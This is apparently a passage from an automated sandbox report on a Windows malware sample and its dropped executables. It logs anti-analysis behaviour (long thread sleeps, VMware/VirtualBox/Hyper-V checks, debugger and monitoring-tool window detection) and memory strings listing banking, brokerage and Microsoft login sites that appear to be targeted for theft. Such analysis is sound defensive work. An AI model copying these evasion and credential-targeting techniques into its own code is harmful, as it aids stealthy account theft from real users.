                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5636Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4070Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3935Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5941Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 492
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 8562
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow / User API: threadDelayed 9121
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062372001\1e1a1f5243.exeJump to dropped file
                            Source: C:\Users\user\Desktop\random.exeAPI coverage: 3.3 %
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6824Thread sleep count: 52 > 30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6824Thread sleep time: -104052s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5908Thread sleep count: 46 > 30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5908Thread sleep time: -92046s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6244Thread sleep count: 492 > 30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6244Thread sleep time: -14760000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5412Thread sleep count: 52 > 30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5412Thread sleep time: -104052s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508Thread sleep count: 43 > 30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508Thread sleep time: -86043s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4508Thread sleep count: 47 > 30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4508Thread sleep time: -94047s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6656Thread sleep time: -540000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508Thread sleep count: 8562 > 30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508Thread sleep time: -17132562s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe TID: 1052Thread sleep time: -180000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe TID: 3544Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe TID: 7124Thread sleep time: -24903104499507879s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe TID: 4788Thread sleep time: -60000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037DBBE
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0034C2A2 FindFirstFileExW,0_2_0034C2A2
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003868EE FindFirstFileW,FindClose,0_2_003868EE
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0038698F
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0037D076
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0037D3A9
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00389642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00389642
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0038979D
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00389B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00389B2B
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00385C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00385C97
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003142DE
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior
                            Source: skotes.exe, skotes.exe, 0000000E.00000000.2209960018.00000000004FA000.00000080.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000E.00000002.2268630160.00000000004FA000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 00000012.00000000.2596243518.00000000004FA000.00000080.00000001.01000000.0000000F.sdmp, skotes.exe, 00000012.00000002.4597840786.00000000004FA000.00000040.00000001.01000000.0000000F.sdmp, 28f48f066a.exe, 00000014.00000002.2855129990.0000000000A7F000.00000040.00000001.01000000.00000011.sdmp, 8c36d696e4.exe, 00000015.00000002.4319785050.0000000000CBB000.00000040.00000001.01000000.00000012.sdmp, 0dd40f41c4.exe, 00000017.00000002.4600523435.000000000114A000.00000040.00000001.01000000.00000014.sdmp, skotes.exe.11.dr, Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                            Source: tmp49F5.tmp.21.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                            Source: mshta.exe, 00000008.00000003.2155076285.0000019D8CEF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}n
                            Source: tmp49F5.tmp.21.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                            Source: tmp49F5.tmp.21.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                            Source: tmp49F5.tmp.21.drBinary or memory string: discord.comVMware20,11696487552f
                            Source: tmp49F5.tmp.21.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                            Source: 28f48f066a.exe, 00000014.00000002.2855939481.0000000001578000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2854179213.0000000001578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*]
                            Source: tmp49F5.tmp.21.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2732201240.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2843550865.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000002.2856066254.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2854179213.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2717731138.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000002.4596746260.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4584422625.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000002.4596746260.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: tmp49F5.tmp.21.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                            Source: tmp49F5.tmp.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                            Source: tmp49F5.tmp.21.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                            Source: tmp49F5.tmp.21.drBinary or memory string: global block list test formVMware20,11696487552
                            Source: tmp49F5.tmp.21.drBinary or memory string: tasks.office.comVMware20,11696487552o
                            Source: 28f48f066a.exe, 00000014.00000003.2762507504.0000000005DDA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                            Source: powershell.exe, 00000009.00000002.2272846870.0000018B6F602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-PSDrive",
                            Source: powershell.exe, 00000006.00000002.2197945789.0000000007979000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y8'
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: tmp49F5.tmp.21.drBinary or memory string: AMC password management pageVMware20,11696487552
                            Source: powershell.exe, 00000006.00000002.2198410239.00000000079EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: tmp49F5.tmp.21.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                            Source: tmp49F5.tmp.21.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                            Source: tmp49F5.tmp.21.drBinary or memory string: dev.azure.comVMware20,11696487552j
                            Source: tmp49F5.tmp.21.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                            Source: tmp49F5.tmp.21.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                            Source: 8c36d696e4.exe, 00000015.00000002.4320829882.00000000013EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                            Source: powershell.exe, 00000006.00000002.2197945789.0000000007979000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                            Source: powershell.exe, 00000009.00000002.2272846870.0000018B6F602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: tmp49F5.tmp.21.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                            Source: tmp49F5.tmp.21.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.00000000057D5000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.000000000592D000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.00000000058BA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005847000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
                            Source: tmp49F5.tmp.21.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                            Source: tmp49F5.tmp.21.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                            Source: tmp49F5.tmp.21.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                            Source: tmp49F5.tmp.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                            Source: tmp49F5.tmp.21.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                            Source: tmp49F5.tmp.21.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                            Source: powershell.exe, 00000006.00000002.2198410239.0000000007A42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                            Source: tmp49F5.tmp.21.drBinary or memory string: outlook.office.comVMware20,11696487552s
                            Source: tmp49F5.tmp.21.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                            Source: tmp49F5.tmp.21.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                            Source: tmp49F5.tmp.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE, 0000000B.00000002.2239758195.0000000000D7A000.00000040.00000001.01000000.0000000C.sdmp, Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE, 0000000B.00000000.2187433765.0000000000D7A000.00000080.00000001.01000000.0000000C.sdmp, Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE, 0000000C.00000002.2284004801.0000000000D7A000.00000040.00000001.01000000.0000000C.sdmp, Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE, 0000000C.00000000.2201086311.0000000000D7A000.00000080.00000001.01000000.0000000C.sdmp, skotes.exe, 0000000D.00000002.2267344677.00000000004FA000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000D.00000000.2208460876.00000000004FA000.00000080.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000E.00000000.2209960018.00000000004FA000.00000080.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000E.00000002.2268630160.00000000004FA000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 00000012.00000000.2596243518.00000000004FA000.00000080.00000001.01000000.0000000F.sdmp, skotes.exe, 00000012.00000002.4597840786.00000000004FA000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                            Source: tmp49F5.tmp.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                            Source: mshta.exe, 00000002.00000002.2147309892.0000000002D0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\RvE?
                            Source: tmp49F5.tmp.21.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESystem information queried: ModuleInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Hides threads from debuggers
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeThread information set: HideFromDebugger
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeThread information set: HideFromDebugger
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeThread information set: HideFromDebugger
                            Tries to detect sandboxes and other dynamic analysis tools (window names)
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeOpen window title or class name: regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeOpen window title or class name: gbdyllo
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeOpen window title or class name: procmon_window_class
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeOpen window title or class name: ollydbg
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeOpen window title or class name: filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: NTICE
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: SICE
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: SIWVID
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_053E0C50 rdtsc 11_2_053E0C50
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038EAA2 BlockInput,0_2_0038EAA2
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00342622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00342622
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003142DE
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00334CE8 mov eax, dword ptr fs:[00000030h]0_2_00334CE8
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00BB652B mov eax, dword ptr fs:[00000030h]11_2_00BB652B
